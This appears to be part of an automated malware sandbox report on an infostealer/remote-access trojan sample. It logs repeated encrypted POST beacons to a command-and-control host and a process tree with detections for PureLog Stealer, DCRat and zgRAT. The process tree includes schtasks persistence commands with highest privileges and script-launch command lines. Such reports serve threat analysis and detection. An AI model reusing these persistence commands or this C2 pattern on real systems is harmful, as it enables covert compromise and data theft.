                                    Aug 25, 2024 15:46:58.683501959 CEST2544OUTData Raw: 5f 54 59 55 51 42 54 51 5b 5f 5a 51 59 53 58 56 57 5f 5d 5c 57 5a 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _TYUQBTQ[_ZQYSXVW_]\WZS^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,3!7 #)Z)=++([;7?7P#W <?]73)Y/>&F$.Y/5
                                    Aug 25, 2024 15:46:59.031261921 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:46:59.228451967 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    90192.168.2.84980380.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:46:59.361831903 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:46:59.715034008 CEST2544OUTData Raw: 5f 56 5c 52 51 44 51 59 5b 5f 5a 51 59 5f 58 52 57 51 5d 58 57 5e 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _V\RQDQY[_ZQY_XRWQ]XW^S^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-;3 ![8]40X)(&)- ,R '?*;4*,.&F$.Y/
                                    Aug 25, 2024 15:47:00.073618889 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:47:00.271404028 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:46:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    91192.168.2.84980480.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:47:00.406059980 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:47:00.792124987 CEST2544OUTData Raw: 5f 53 5c 57 54 49 54 5f 5b 5f 5a 51 59 52 58 54 57 58 5d 5a 57 5c 53 5e 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _S\WTIT_[_ZQYRXTWX]ZW\S^YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.Y,+!(\ 3%==0>-*(?#Z?7??*( 09Y;>&F$.Y/1


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    92192.168.2.84980580.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:47:01.033205032 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1848
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:47:01.386477947 CEST1848OUTData Raw: 5a 51 5c 57 54 40 51 59 5b 5f 5a 51 59 57 58 50 57 51 5d 5c 57 50 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZQ\WT@QY[_ZQYWXPWQ]\WPS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.,U;D"47#*>= (%+=(4<7Q#W8W+)X"0>/>&F$.Y/
                                    Aug 25, 2024 15:47:01.704473972 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:47:01.907390118 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:47:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 55 2a 0b 2a 5c 25 2b 33 0c 30 20 22 52 2b 2d 37 58 2b 3d 25 5f 24 16 0b 59 32 3d 23 0f 26 38 22 03 28 00 2a 1a 32 06 27 1e 3a 1e 2b 5d 0c 13 22 5f 20 5c 2a 1e 24 3c 3c 13 3e 28 0d 18 35 02 29 00 2b 04 21 16 3f 2c 20 1d 3c 39 02 02 2b 2a 0f 0e 3b 06 2e 02 2e 33 39 0f 34 3e 2b 52 0d 11 27 0e 2b 03 3e 0f 28 3e 37 5f 36 06 01 12 24 3d 21 0d 31 21 31 0f 27 17 01 00 26 1c 1b 56 24 1f 39 1f 26 3b 0c 12 25 2f 07 54 35 08 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &U**\%+30 "R+-7X+=%_$Y2=#&8"(*2':+]"_ \*$<<>(5)+!?, <9+*;..394>+R'+>(>7_6$=!1!1'&V$9&;%/T5#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    93192.168.2.84980680.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:47:01.152983904 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:47:01.511677027 CEST2544OUTData Raw: 5f 56 59 57 51 44 54 5d 5b 5f 5a 51 59 53 58 55 57 5b 5d 53 57 5a 53 58 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _VYWQDT][_ZQYSXUW[]SWZSXYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.X83?6'#0>=3<>?[8 $!!?#35^/.&F$.Y/5
                                    Aug 25, 2024 15:47:01.823167086 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:47:02.020256996 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:47:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    94192.168.2.84980780.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:47:02.154654980 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:47:02.511579037 CEST2544OUTData Raw: 5f 5d 59 54 54 41 54 59 5b 5f 5a 51 59 53 58 55 57 5a 5d 52 57 59 53 5c 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _]YTTATY[_ZQYSXUWZ]RWYS\YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,U3@6$#39\=4<=%[+=/7?0 ;+:7^ 5Y;&F$.Y/5
                                    Aug 25, 2024 15:47:02.817625046 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:47:02.946326017 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:47:02 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    95192.168.2.84980880.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:47:03.081351995 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:47:03.495616913 CEST2544OUTData Raw: 5f 54 59 50 54 46 51 5e 5b 5f 5a 51 59 56 58 52 57 59 5d 5e 57 5d 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _TYPTFQ^[_ZQYVXRWY]^W]SUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.\;3"0Y" "*$\<-_?,7?7<*97"09]8&F$.Y/!
                                    Aug 25, 2024 15:47:03.753434896 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:47:03.950560093 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:47:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    96192.168.2.84980980.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:47:04.104310989 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:47:04.448987007 CEST2544OUTData Raw: 5a 56 5c 5e 51 45 51 5b 5b 5f 5a 51 59 53 58 52 57 5f 5d 52 57 50 53 5b 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZV\^QEQ[[_ZQYSXRW_]RWPS[YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.8/!0\76*=<]+>(=4Z3#",<:<4:/&F$.Y/5
                                    Aug 25, 2024 15:47:04.773593903 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:47:04.920119047 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:47:04 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    97192.168.2.84981080.211.144.156804536C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:47:05.047229052 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:47:05.402195930 CEST2544OUTData Raw: 5f 57 59 55 54 40 54 51 5b 5f 5a 51 59 55 58 56 57 5d 5d 59 57 5a 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _WYUT@TQ[_ZQYUXVW]]YWZSYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.^;3?5X 6*4]>>)[<'[#,+S 1,*:$7%\8&F$.Y/-
                                    Aug 25, 2024 15:47:05.743324041 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:47:05.942663908 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:47:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:1
                                    Start time:09:45:00
                                    Start date:25/08/2024
                                    Path:C:\Users\user\Desktop\Internal.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Internal.exe"
                                    Imagebase:0x4f0000
                                    File size:3'265'288 bytes
                                    MD5 hash:15E81B6E3999600603D0F8B0DD22C33E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Borland Delphi
                                    Yara matches:
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1412731329.0000000007801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1412020893.0000000006E0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:09:45:02
                                    Start date:25/08/2024
                                    Path:C:\Windows\SysWOW64\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe"
                                    Imagebase:0x8e0000
                                    File size:147'456 bytes
                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:09:45:30
                                    Start date:25/08/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Blockcomcrt\nSU3qQKworl3edB45UU9ztPa7aJlyWb1ixvBGEiQTt7.bat" "
                                    Imagebase:0xa40000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:09:45:31
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6ee680000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:09:45:31
                                    Start date:25/08/2024
                                    Path:C:\Blockcomcrt\AgentMonitor.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Blockcomcrt/AgentMonitor.exe"
                                    Imagebase:0x830000
                                    File size:1'961'472 bytes
                                    MD5 hash:84072063FC067434706597D88E3252A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000000.1708671234.0000000000832000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.1763759179.0000000012E58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Blockcomcrt\AgentMonitor.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Blockcomcrt\AgentMonitor.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 88%, ReversingLabs
                                    • Detection: 55%, Virustotal, Browse
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:09:45:33
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:09:45:33
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhX" /sc ONLOGON /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:09:45:33
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:10
                                    Start time:09:45:33
                                    Start date:25/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline"
                                    Imagebase:0x7ff6f9f10000
                                    File size:2'759'232 bytes
                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:11
                                    Start time:09:45:33
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6ee680000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:12
                                    Start time:09:45:33
                                    Start date:25/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA6D0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4F1AC5479EE446D0ADC298BB684B1769.TMP"
                                    Imagebase:0x7ff6f88b0000
                                    File size:52'744 bytes
                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:13
                                    Start time:09:45:34
                                    Start date:25/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.cmdline"
                                    Imagebase:0x7ff6f9f10000
                                    File size:2'759'232 bytes
                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:14
                                    Start time:09:45:34
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6ee680000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:15
                                    Start time:09:45:34
                                    Start date:25/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA8B5.tmp" "c:\Windows\System32\CSCF64B5552E20A487EA7DE13E15F90A989.TMP"
                                    Imagebase:0x7ff6f88b0000
                                    File size:52'744 bytes
                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:16
                                    Start time:09:45:34
                                    Start date:25/08/2024
                                    Path:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe"
                                    Imagebase:0xc50000
                                    File size:1'961'472 bytes
                                    MD5 hash:84072063FC067434706597D88E3252A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2655054570.0000000003A48000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2655054570.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
